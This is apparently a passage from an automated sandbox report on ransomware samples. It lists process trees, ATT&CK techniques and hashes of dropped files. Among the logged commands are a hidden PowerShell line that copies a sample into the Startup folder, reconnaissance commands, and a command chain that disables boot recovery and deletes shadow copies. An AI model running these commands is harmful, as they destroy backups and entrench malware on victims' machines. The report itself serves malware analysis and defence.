        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:7008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:6400
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:4984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:2976
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:1768
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:1236
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:924
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:3392
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:3940
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:3868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:6764
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:2384
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:3448
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:2848
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:4148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:4144
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:4452
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:4500
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:2164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:4320
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:6608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:4360
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:4432
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:5604
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:6084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:4400
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:4580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:3116
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:7276
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:7336
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:7760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:7792
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:7588
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:7652
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:7448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:7496
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:10440
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:10828
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:10236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:10836
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:9064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:10272
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:10876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:10896
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:10244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:9752
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:11312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:11284
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:12696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:12252
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:14824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:11660
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:14720
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:12088
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:14852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:12616
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:16776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:13132
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:16860
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:13944
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:16868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:13320
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:17000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:14224
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:16992
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:9080
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:15496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:13428
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:12168
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:14068
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:18076
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:14920
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\PROGRA~3\IIXguS.vbs"
        5⤵
        
        PID:18112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:15664
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:16040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\PROGRA~3\IIXguS.vbs
      4⤵
      PID:19024
- C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe
  "C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe"
  2⤵
  PID:7076
- C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exe
  "C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exe"
  2⤵
  PID:4860
- C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exe
  "C:\Users\Admin\Desktop\00310\HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exe"
  2⤵
  PID:1644
- C:\Windows\system32\rundll32.exe
  "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Public\Desktop\IHCUXUI
  2⤵
  PID:4320
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\E6F0.bin1"
  2⤵
  PID:12028
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:11888
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E6F0.bin1"
  2⤵
  PID:12388
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\E6F0.bin1"
  2⤵
  PID:12980
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:13120
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E6F0.bin1"
  2⤵
  PID:15560
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\E6F0.bin1"
  2⤵
  PID:16092
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:16408
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E6F0.bin1"
  2⤵
  PID:16588
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\E6F0.bin1"
  2⤵
  PID:13360

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1428

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5423418021288636077-7264690125235657843038012671581181017-544279244-1079829412"
1⤵
PID:848

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20599426-1802445060-1396856255-1166736270-390741773-1228578466-1155201647-1185820057"
1⤵
PID:3068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17237872969376029281474227392403284141472674118-11480520211927724409-237614323"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-282578233-1194601631-702565161-6953348646980648316629930811184167410994590502"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2704

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9959090231422242986203001661863916774-490592436-21337656251259221111-362813743"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "148148860248884394-241223123-603239223-456009611973793684-19491811001563724461"
1⤵
PID:2104

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "508302118130798341915216087583990749571387651177-1598518223-1559182792785255881"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1628

C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe -m security
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3948

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20353138561006002496-2100510104-11561840451197344671-2323701521028504128-1584493849"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1484

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "138803031217109142981788085475-583346238409267798656465762-1084962407935321441"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3980

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1124959436-1802157278-622876026-1758728300-2147412380-670379389-534379420-1038976210"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1160

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1281180375-574137601517248458-1591194807-208975769912868419271442127546-141824692"
1⤵
PID:2388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /u "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe"
1⤵
- Process spawned unexpected child process
- Looks for VMWare services registry key.
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2508
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -exec bypass Import-Module BitsTransfer; Start-BitsTransfer 'C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindPlugin.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  PID:3740
- C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
  "C:\Users\Admin\Desktop\00310\Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe"
  2⤵
  - Event Triggered Execution: Image File Execution Options Injection
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Indicator Removal: Clear Persistence
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: MapViewOfSection
  PID:7084
- - C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    3⤵
    - Modifies firewall policy service
    - Event Triggered Execution: Image File Execution Options Injection
    - Checks BIOS information in registry
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies Internet Explorer Protected Mode
    - Modifies Internet Explorer Protected Mode Banner
    - Modifies Internet Explorer settings
    - Suspicious behavior: MapViewOfSection
    PID:4348

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-118531877-10953405311066445930-205845854476515450172707171410573805122125177425"
1⤵
PID:3004

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2020

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7080

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:5288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1822219984748846868-1302546941-23838993916516132991361353424-6312442251675672031"
1⤵
PID:3140

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1402973785-271945265263467613-34053906172770687-1826473926382344618349660836"
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
1⤵
- Drops file in System32 directory
PID:1328

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & vssadmin.exe delete shadows /all /quiet & net stop vss
1⤵
- Process spawned unexpected child process
PID:1432
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1192
- C:\Windows\system32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5476
- C:\Windows\system32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5092
- C:\Windows\system32\net.exe
  net stop vss
  2⤵
  PID:6000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vss
    3⤵
    PID:5740

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1820029086-692687778-359123049649262640296350747-11730651561128499137-1889383716"
1⤵
PID:2464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Persistence

T1070.009

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\EFSTMPWP\fil2E32.tmp

Filesize
4KB

MD5
620f0b67a91f7f74151bc5be745b7110

SHA1
1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d

SHA256
ad7facb2586fc6e966c004d7d1d16b024f5805ff7cb47c7a85dabd8b48892ca7

SHA512
2d23913d3759ef01704a86b4bee3ac8a29002313ecc98a7424425a78170f219577822fd77e4ae96313547696ad7d5949b58e12d5063ef2ee063b595740a3a12d

Download Submit
C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\[HOW_TO_DECRYPT_FILES].html

Filesize
8KB

MD5
5da8429cdddb567db07ddc6a86c8c421

SHA1
4f56151f5260da7e97a9cdbb41c8b9c2f0ce378c

SHA256
65dac0aaad08992d46c538814fffc57fdcbc87b61a98d83a9d2a408f38b6ce74

SHA512
2f0c5f1fe79d934f2e75ae593e70dedcd8378b4727efc819cac5ec175872646063d61e92da20f6752b8f4ff8ef9d5df5b290409b3de2330497e6d9648e41924d

Download Submit
C:\PROGRA~3\IIXguS.lnk

Filesize
626B

MD5
56322bb4116f2ed09b521fc92c20547f

SHA1
93f2a8d12a076f222b663a32c928129a74abaed6

SHA256
52ec823dcfce4d58ef513796f73a507fc97f83e6c09cdab1c8ddbefe271aec07

SHA512
d18fa202a6dfaba36bfbd4a8d310fc3a145ed4c576d089130ca18132fc5053bb18d257f6313264cb8279dc37cf8aaa693748ca19937eb69e7dfef837c64bcd76

Download Submit
C:\PROGRA~3\IIXguS.vbs

Filesize
522B

MD5
a72fab6095de9e44998b70814ae75979

SHA1
078ce72bc44a1bb302885eb284928697edeb3ec4

SHA256
ffca5a131a56a3ca79a7ef4b347450e63765df0153ffa7fdc0140d4f7e247deb

SHA512
4fe8b940eae8aa0b572fc1b86b04bb303b4e7ed595d4fdd722a7c7fadbefea99c7eb009f883cc2b0bb8ea9148ad7ba3d29fe97dc0c6fac3f6a433edacaec422c

Download Submit
C:\ProgramData\IIXguS

Filesize
279KB

MD5
65be00896f4c969af54d95c81fe55c12

SHA1
418faf7cd17a80c1b789ca4160f8f23e37d2de90

SHA256
90beeb816707e78a4101ff2b9adcabcc7aa6fedf174e3f530e2b54a241438f70

SHA512
c78bcba735a675bd4a5e0629e256df6f2dd664625eaa8586790ace8ac51b3dafd04fb4f17fe6fec4718cd657f441337d04bd921f121d49196a3f97f40757ecd9

Download Submit
C:\ProgramData\IIXguS.exe

Filesize
732KB

MD5
71d8f6d5dc35517275bc38ebcc815f9f

SHA1
cae4e8c730de5a01d30aabeb3e5cb2136090ed8d

SHA256
fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b

SHA512
4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\036eb9844b7f6bdbce53a8ba3adb3e9f_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

Filesize
66B

MD5
402535c9f22ff836ea91dd12e8b8847b

SHA1
707efc314ec536abed535cdb1b2414aba4713577

SHA256
efbb03b7a7f6fd3c29391d4d0281e1830a85caadd831c3f04716faca4107a42e

SHA512
6c0e9557cf0fadf4db740e203df3d499f7247a472d9132b7e474420b142ae83e6cab592f93aa096d51c04f732098fa7355622e955b459f1c6d87bae8abc73264

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\09007526232f4389ecdb33474b603f04_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

Filesize
77B

MD5
2b62a30906a2b8bf3b68abd2ef9d105b

SHA1
9898d25a214dba04ebd7e3030ac9e2e90ea7a369

SHA256
075561eff2cd3ad586776fa904f0040282c5f6a261f6a8fd6a0a524d14cd2d2c

SHA512
6db5955477a9bb5386c1af03df526496f9e64533e6c3071c8e5c44062541e91e9bb39096da947a91bdfa5e7de53c1e047dcf427c1dfde94554d7458f8f0862ea

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\13cff5e653dda9d1ac78613931d8474f_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

Filesize
73B

MD5
fa67ab9184f8d574cef7cd8e0b2f1a78

SHA1
03a0093aa2d121e7ca3feabb0ec19ff2e15179b8

SHA256
9c56f48ae9bafd205262034bfcc2232b2c63348cb723d681ec39f13409f990cc

SHA512
e64c06bb828a1e41e494d4a153ba411d5b6f33b46dd0008c1e793ef0b6b12e9312cccc321bc2161ec859bbcbb79b874db8793dea1b0ea1414e13185bfa7ff178

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\1c25469d632649991f0babace22dae4a_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

Filesize
63B

MD5
65cecfb980d72fde57d175d6ec1c3f64

SHA1
0b8bf9fc37ad802cefa6733ec62b09d5f43a1b75

SHA256
c7723fa1e0127975e49e62e753db53924c1bd84b8ac1ac08df78d09270f3d971

SHA512
a405dec5087e201200212d9b99c62298c3b126681b5d607f39e9356bcfbf5fe618c53d5c31d31903d5a1d76f7ef8225d8c6dca92df040c6cc7ca3393f25131dc

Download Submit
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\30f6b43f1abec04932adafd06be61289_18cc84e5-41c1-45e6-bdc9-06ff0c9e128a

Filesize
80B

MD5
bbf7c6077962a7c28114dbd10be947cd

SHA1
8fc36a50d0ba5aabfa3cb92d81fe9fdc4686e6a3

SHA256
5b6fb58e61fa475939767d68a446f97f1bff02c0e5935a3ea8bb51e6515783d8

SHA512
